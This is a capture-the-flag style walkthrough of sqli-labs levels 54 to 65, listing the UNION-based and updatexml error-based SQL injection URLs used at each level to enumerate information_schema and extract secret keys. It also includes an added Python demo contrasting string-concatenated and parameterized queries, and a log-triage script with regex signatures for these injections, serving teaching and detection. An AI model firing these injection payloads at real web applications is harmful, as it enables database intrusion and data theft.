sql-lab (54-65)
2022-07-07 12:24:00 【hcjtn】
(54~60)
sql-lab-54
From level 54 on, the levels get harder.
Level 54 only allows ten statements. After ten statements the lab refreshes all the database names, table names and column names, so from this level on all statements are for reference only.
Step 1: determine how the parameter is closed:
?id=1' and 1=2 -- q
The page reports an error, so the closure is a single quote.
Step 2: check whether any keywords are filtered.
Step 3: decide how to construct the injection statement.
This page echoes query results, so use a UNION query:
?id=-1' union select 1,2,database() -- q
The database name is: challenges
?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema='challenges' limit 0,1 -- q
The table name is: ufka71dqts
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='ufka71dqts' -- q
The column names are: id,sessid,secret_JZU6,tryy
?id=-1' union select 1,secret_JZU6,3 from ufka71dqts -- q
The query succeeds. Submit the result under: Submit Secret Key
This level is solved!
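Why the closure has to be identified first, and why it stops mattering once the value is bound as a parameter. This is an added example, not code from the original post or from the lab: it uses Python's sqlite3 with a constructed users table as a stand-in for the lab's MySQL backend, and the WRAPPERS query shapes are assumptions modelled on the closures found in levels 54 to 56.

```python
import sqlite3

def make_db():
    # Constructed table standing in for the lab's MySQL data.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return db

# Assumed query shapes: how the id value is wrapped before it reaches the database.
WRAPPERS = {
    "'":  "SELECT * FROM users WHERE id='{}' LIMIT 1",    # level 54 closure
    ")":  "SELECT * FROM users WHERE id=({}) LIMIT 1",    # level 55 closure
    "')": "SELECT * FROM users WHERE id=('{}') LIMIT 1",  # level 56 closure
}

def run_concat(db, template, value):
    """Vulnerable pattern: the request value is pasted into the SQL text."""
    try:
        return db.execute(template.format(value)).fetchall()
    except sqlite3.Error:
        return "error"  # a wrong closure usually just breaks the syntax

def run_bound(db, value):
    """Hardened pattern: the value is bound, so it is only ever compared as data."""
    return db.execute("SELECT * FROM users WHERE id=? LIMIT 1", (value,)).fetchall()

def input_changes_logic(run, closer):
    """True if the 'and 1=1' / 'and 1=2' pair behind `closer` gives different results."""
    return run(f"1{closer} and 1=1 -- q") != run(f"1{closer} and 1=2 -- q")

def closure_matrix(db):
    """For each wrapper, the closers under which request input alters the query logic."""
    return {
        wrapper: [c for c in WRAPPERS
                  if input_changes_logic(lambda v: run_concat(db, tpl, v), c)]
        for wrapper, tpl in WRAPPERS.items()
    }

def bound_is_affected(db):
    """The same probes run against the parameterized query."""
    return [c for c in WRAPPERS if input_changes_logic(lambda v: run_bound(db, v), c)]

if __name__ == "__main__":
    db = make_db()
    print(closure_matrix(db))     # each wrapper reacts only to its own closer
    print(bound_is_affected(db))  # no closer reaches the SQL parser
```

With string concatenation exactly one closer per query shape turns request input into SQL; with a bound parameter none does, whatever the wrapping looks like.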
sql-lab-55
Determine the closure: ?id=1) and 1=1 -- q
The closure turns out to be a parenthesis.
Decide how to construct the injection statement.
This page echoes query results, so use a UNION query:
?id=-1) union select 1,2,database() -- q
The database name is: challenges
?id=-1) union select 1,table_name,3 from information_schema.tables where table_schema='challenges' limit 0,1 -- q
The table name is: qbj8tdrlxb
?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='qbj8tdrlxb' -- q
The column names are: id,sessid,secret_N7EM,tryy
?id=-1) union select 1,secret_N7EM,3 from qbj8tdrlxb -- q
The query succeeds. Submit the result under: Submit Secret Key
This level is solved!
sql-lab-56
Determine the closure: ?id=1') and 1=1 -- q
Decide how to construct the injection statement.
This page echoes query results, so use a UNION query:
?id=-1') union select 1,2,database() -- q
The database name is: challenges
?id=-1') union select 1,table_name,3 from information_schema.tables where table_schema='challenges' limit 0,1 -- q
The table name is: okzcd5g9co
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='okzcd5g9co' -- q
The column names are: id,sessid,secret_W8S8,tryy
?id=-1') union select 1,secret_W8S8,3 from okzcd5g9co -- q
The query succeeds. Submit the result under: Submit Secret Key
This level is solved!
sql-lab-57
This level is the same as the previous one except for the closure.
Determine the closure: ?id=1" and 1=1 -- q
sql-lab-58
First determine the closure: ?id=1' and 1=1 -- q
A UNION query turns out not to work here, so we use error-based injection.
?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) -- q
The database name is: challenges
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- q
The table name is: 20lvmztx1r
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='20lvmztx1r' limit 0,1),0x7e),1) -- q
The column names are: id,sessid,secret_X8WY,tryy
?id=1' and updatexml(1,concat(0x7e,(select secret_X8WY from 20lvmztx1r limit 0,1),0x7e),1) -- q
The query succeeds.
This level is solved!
sql-lab-59
?id=1 and 1=2-- q
?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q
?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q
?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fjwx950mdd' limit 0,1),0x7e),1)-- q
?id=1 and updatexml(1,concat(0x7e,(select secret_Z2BD from fjwx950mdd limit 0,1),0x7e),1)-- q
sql-lab-60
?id=1") and 1=2 -- q
?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1) -- q
?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- q
?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='hmguhc8wji' limit 0,1),0x7e),1) -- q
?id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from hmguhc8wji limit 0,1),0x7e),1) -- q
(61~65)
sql-lab-61
?id=1')) and 1=1 -- q
?id=1')) and updatexml(1,concat(0x7e,database(),0x7e),1) -- q
?id=1')) and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) -- q
?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qd5l9mppz3' limit 0,1),0x7e),1) -- q
?id=1')) and updatexml(1,concat(0x7e,(select secret_ZHCO from qd5l9mppz3 limit 0,1),0x7e),1) -- q
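The UNION-based and error-based requests used in levels 54 to 61 leave recognisable traces in a web server access log. The following is an added example, not part of the original post or the lab: a small log triage script whose log lines, IP addresses and paths are constructed, and whose signature names are assumptions chosen for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the request shapes used in levels 54 to 61 of this write-up.
SIGNATURES = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "union_select":  re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum":   re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
    "error_based":   re.compile(r"\bupdatexml\s*\("),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

# Constructed access-log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jul/2022:12:01:10 +0000] "GET /sql-lab-54/?id=1%27%20and%201=2%20--%20q HTTP/1.1" 200 812
203.0.113.7 - - [07/Jul/2022:12:01:31 +0000] "GET /sql-lab-54/?id=-1%27%20union%20select%201,2,database()%20--%20q HTTP/1.1" 200 840
203.0.113.7 - - [07/Jul/2022:12:02:02 +0000] "GET /sql-lab-54/?id=-1%27+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=%27challenges%27+limit+0,1+--+q HTTP/1.1" 200 851
203.0.113.7 - - [07/Jul/2022:12:05:44 +0000] "GET /sql-lab-58/?id=1%27%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)%20--%20q HTTP/1.1" 200 799
198.51.100.20 - - [07/Jul/2022:12:06:01 +0000] "GET /sql-lab-54/?id=2 HTTP/1.1" 200 805
198.51.100.20 - - [07/Jul/2022:12:06:09 +0000] "GET /search?q=student+union+and+select+committee HTTP/1.1" 200 1530
"""

def classify(url):
    """Return the names of all signatures that match one request URL."""
    # Decode %xx and '+' first: the raw log never contains a literal quote or space.
    text = re.sub(r"\s+", " ", unquote_plus(url).lower())
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}

def summarize(log_text):
    """Per client IP: number of matching requests and the techniques seen."""
    report = defaultdict(lambda: {"hits": 0, "techniques": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, url, _status = m.groups()
        found = classify(url)
        if found:
            report[ip]["hits"] += 1
            report[ip]["techniques"] |= found
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["techniques"]))
```

A client that moves from a boolean probe to schema enumeration within a few requests, as the first address does here, is a stronger signal than any single keyword match.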
sql-lab-62~65
In these levels neither UNION queries nor error-based injection can be used.
First determine the closure:
?id=1') and 1=1 -- q
Then use blind injection.
Writing a blind injection script is recommended.
That concludes sql-lab.